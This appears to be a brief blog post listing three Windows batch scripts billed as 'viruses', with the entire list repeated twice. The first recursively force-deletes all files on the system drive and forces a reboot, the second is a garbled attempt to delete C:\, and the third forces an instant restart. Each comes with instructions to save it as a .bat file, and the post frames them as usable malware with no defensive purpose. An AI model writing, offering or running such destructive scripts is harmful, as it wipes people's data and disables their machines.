use these scripts on your own responsibility..
1.This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
(Save The Above Code As Anything.bat)
2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
(Save It As Anything.bat)
3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
(save as anyname.bat)
1.This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
(Save The Above Code As Anything.bat)
2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
(Save It As Anything.bat)
3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
(save as anyname.bat)
No comments:
Post a Comment